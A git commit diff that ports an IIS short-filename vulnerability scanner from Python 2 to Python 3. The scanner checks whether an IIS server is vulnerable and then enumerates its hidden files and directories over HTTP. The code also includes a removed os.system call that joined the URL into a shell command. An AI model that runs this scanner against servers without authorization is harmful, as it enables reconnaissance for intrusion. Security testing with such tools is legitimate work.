1120362990/vulnerability-list
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

iis_shortname_Scan python3 fixed

Browse Source
This commit is contained in:
rpkr
2019-03-14 21:15:10 +08:00
parent f87e0b743b
commit c2644fa279
2 changed files with 44 additions and 42 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
iis/Main_iis.py
View File

@@ -1,13 +1,15 @@
# -*- coding: utf-8 -*-
import ipquery.ipquery
import iis.iis_shortname_Scan
import os
def exec(URL):
print('[+]开始检测-IIS短文件名漏洞。[+]')
#切换工作路径
os.chdir('iis')
os.system("py -2 iis_shortname_Scan.py "+URL)
print('[+]检测完成-IIS短文件名漏洞。[+]')
# print('[+]开始检测-IIS短文件名漏洞。[+]')
# #切换工作路径
# os.chdir('iis')
# os.system("py -2 iis_shortname_Scan.py "+URL)
# print('[+]检测完成-IIS短文件名漏洞。[+]')
iis.iis_shortname_Scan.attack(URL)
if __name__ == "__main__":
exec()

72
iis/iis_shortname_Scan.py
View File

@@ -4,10 +4,10 @@
import sys
import httplib
import urlparse
import http.client
from urllib.parse import urlparse
import threading
import Queue
import queue
import time
@@ -17,29 +17,29 @@ class Scanner():
if not self.target.startswith('http'):
self.target = 'http://%s' % self.target
self.scheme, self.netloc, self.path, params, query, fragment = \
urlparse.urlparse(target)
urlparse(target)
if self.path[-1:] != '/': # ends with slash
self.path += '/'
self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
self.files = []
self.dirs = []
self.queue = Queue.Queue()
self.queue = queue.Queue()
self.lock = threading.Lock()
self.threads = []
self.request_method = ''
self.msg_queue = Queue.Queue()
self.msg_queue = queue.Queue()
self.STOP_ME = False
threading.Thread(target=self._print).start()
def _conn(self):
try:
if self.scheme == 'https':
conn = httplib.HTTPSConnection(self.netloc)
conn = http.client.HTTPSConnection(self.netloc)
else:
conn = httplib.HTTPConnection(self.netloc)
conn = http.client.HTTPConnection(self.netloc)
return conn
except Exception, e:
print '[_conn.Exception]', e
except Exception as e:
print('[_conn.Exception]', e)
return None
def _get_status(self, path):
@@ -49,7 +49,7 @@ class Scanner():
status = conn.getresponse().status
conn.close()
return status
except Exception, e:
except Exception as e:
raise Exception('[_get_status.Exception] %s' % str(e) )
def is_vul(self):
@@ -61,7 +61,7 @@ class Scanner():
if status_1 == 404 and status_2 != 404:
return True
return False
except Exception, e:
except Exception as e:
raise Exception('[is_vul.Exception] %s' % str(e) )
def run(self):
@@ -76,21 +76,21 @@ class Scanner():
self.STOP_ME = True
def report(self):
print '-'* 64
print('-'* 64)
for d in self.dirs:
print 'Dir: %s' % d
print('Dir: %s' % d)
for f in self.files:
print 'File: %s' % f
print '-'*64
print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))
print 'Note that * is a wildcard, matches any character zero or more times.'
print('File: %s' % f)
print('-'*64)
print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
print('Note that * is a wildcard, matches any character zero or more times.')
def _print(self):
while not self.STOP_ME or (not self.msg_queue.empty()):
if self.msg_queue.empty():
time.sleep(0.05)
else:
print self.msg_queue.get()
print(self.msg_queue.get())
def _scan_worker(self):
while True:
@@ -121,24 +121,24 @@ class Scanner():
if len(ext) < 4: # < len('.as*')
self.queue.put( (url, ext[:-1] + c) )
except Queue.Empty,e:
except queue.Empty as e:
break
except Exception, e:
print '[Exception]', e
except Exception as e:
print('[Exception]', e)
def attack(URL):
s = Scanner(URL)
if not s.is_vul():
s.STOP_ME = True
print('Server is not vulnerable')
sys.exit(0)
print('Server is vulnerable, please wait, scanning...')
s.run()
s.report()
if __name__ == '__main__':
if len(sys.argv) == 1:
print 'Usage: python IIS_shortname_Scan.py http://www.target.com/'
sys.exit()
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
s.STOP_ME = True
print 'Server is not vulnerable'
sys.exit(0)
print 'Server is vulnerable, please wait, scanning...'
s.run()
s.report()
attack()